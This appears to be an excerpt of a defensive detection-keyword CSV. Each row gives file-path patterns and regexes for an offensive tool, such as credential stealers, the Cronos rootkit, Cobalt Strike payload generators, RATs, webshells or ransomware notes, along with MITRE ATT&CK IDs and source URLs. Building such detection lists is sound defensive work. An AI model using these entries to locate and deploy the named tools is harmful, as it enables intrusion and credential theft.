"*\Crassus-main*",".{0,1000}\\Crassus\-main.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","14647"
"*\CrazyMouse.exe*",".{0,1000}\\CrazyMouse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14648"
"*\create_webshell_with_py.py*",".{0,1000}\\create_webshell_with_py\.py.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14649"
"*\Create-HotKeyLNK.ps1*",".{0,1000}\\Create\-HotKeyLNK\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","14650"
"*\Create-MultipleSessions.ps1*",".{0,1000}\\Create\-MultipleSessions\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14651"
"*\CreateService-master\*",".{0,1000}\\CreateService\-master\\.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","N/A","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","14653"
"*\CreateService-master\CreateService\*",".{0,1000}\\CreateService\-master\\CreateService\\.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","N/A","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","14654"
"*\CreateTokenVariant.exe*",".{0,1000}\\CreateTokenVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","14655"
"*\creddump.py*",".{0,1000}\\creddump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","14656"
"*\creddump7-master*",".{0,1000}\\creddump7\-master.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","14657"
"*\credential access.cna*",".{0,1000}\\credential\saccess\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14658"
"*\credentials.log*",".{0,1000}\\credentials\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14660"
"*\CredHistView.cfg*",".{0,1000}\\CredHistView\.cfg.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A","14661"
"*\credhistview.lnk*",".{0,1000}\\credhistview\.lnk.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A","14662"
"*\credhistview\*",".{0,1000}\\credhistview\\.{0,1000}","offensive_tool_keyword","credhistview","This tool allows you to decrypt the CREDHIST file and view the SHA1 and NTLM hashes of all previous passwords you used on your system","T1003 - T1081 - T1110","TA0006 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/credhist_view.html","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A","14663"
"*\creditcards.py*",".{0,1000}\\creditcards\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","14664"
"*\credmaster.py*",".{0,1000}\\credmaster\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14665"
"*\credmaster.txt*",".{0,1000}\\credmaster\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14666"
"*\CredMaster-master.zip*",".{0,1000}\\CredMaster\-master\.zip.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14667"
"*\credmaster-success.txt*",".{0,1000}\\credmaster\-success\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14668"
"*\credmaster-validusers.txt*",".{0,1000}\\credmaster\-validusers\.txt.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","14669"
"*\CredPhisher.exe*",".{0,1000}\\CredPhisher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14670"
"*\CredPhisher.exe*",".{0,1000}\\CredPhisher\.exe.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","N/A","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","14671"
"*\CredPhisher.pdb*",".{0,1000}\\CredPhisher\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14672"
"*\CredPhisher.pdb*",".{0,1000}\\CredPhisher\.pdb.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#content","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","14673"
"*\CredsPhish.log*",".{0,1000}\\CredsPhish\.log.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","#logfile","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","14674"
"*\CriticalBreachDetected.txt*",".{0,1000}\\CriticalBreachDetected\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14675"
"*\Cronos Rootkit.sln*",".{0,1000}\\Cronos\sRootkit\.sln.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","14677"
"*\Cronos Rootkit\*",".{0,1000}\\Cronos\sRootkit\\.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","14678"
"*\CronosDebugger.vcxproj*",".{0,1000}\\CronosDebugger\.vcxproj.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","14679"
"*\Cronos-x64.zip*",".{0,1000}\\Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","14680"
"*\CrossC2.*",".{0,1000}\\CrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","14681"
"*\CROSSNET\CROSSNET\*",".{0,1000}\\CROSSNET\\CROSSNET\\.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","0","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","14682"
"*\cryptomix.txt*",".{0,1000}\\cryptomix\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14683"
"*\Crypttest\*.encrypted*",".{0,1000}\\Crypttest\\.{0,1000}\.encrypted.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14684"
"*\crytox.hta*",".{0,1000}\\crytox\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14685"
"*\CScrandle_fileless.cs*",".{0,1000}\\CScrandle_fileless\.cs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14686"
"*\csexec.exe*",".{0,1000}\\csexec\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14687"
"*\CSExec-master\*",".{0,1000}\\CSExec\-master\\.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14688"
"*\csexecsvc.exe*",".{0,1000}\\csexecsvc\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14689"
"*\csexecsvc.exe*",".{0,1000}\\csexecsvc\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14690"
"*\csexecsvc-net35.exe*",".{0,1000}\\csexecsvc\-net35\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14691"
"*\csexecsvc-net35.exe*",".{0,1000}\\csexecsvc\-net35\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14692"
"*\csexecsvc-net40.exe*",".{0,1000}\\csexecsvc\-net40\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14693"
"*\csexecsvc-net40.exe*",".{0,1000}\\csexecsvc\-net40\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14694"
"*\csexecsvc-net45.exe*",".{0,1000}\\csexecsvc\-net45\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","14695"
"*\csexecsvc-net45.exe*",".{0,1000}\\csexecsvc\-net45\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","14696"
"*\CsOnTheFly.ps1*",".{0,1000}\\CsOnTheFly\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14697"
"*\cstealer.py*",".{0,1000}\\cstealer\.py.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","0","N/A","N/A","10","","N/A","","","","14698"
"*\Cstrike Rat.exe*",".{0,1000}\\Cstrike\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14699"
"*\ctblocker.txt*",".{0,1000}\\ctblocker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14700"
"*\ctfr.py*",".{0,1000}ctfr\.py.{0,1000}","offensive_tool_keyword","ctfr","Abusing Certificate Transparency logs for getting HTTPS websites subdomains.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Reconnaissance","https://github.com/UnaPibaGeek/ctfr","1","0","N/A","N/A","N/A","10","2015","297","2024-01-02T17:19:37Z","2018-03-06T01:14:28Z","14701"
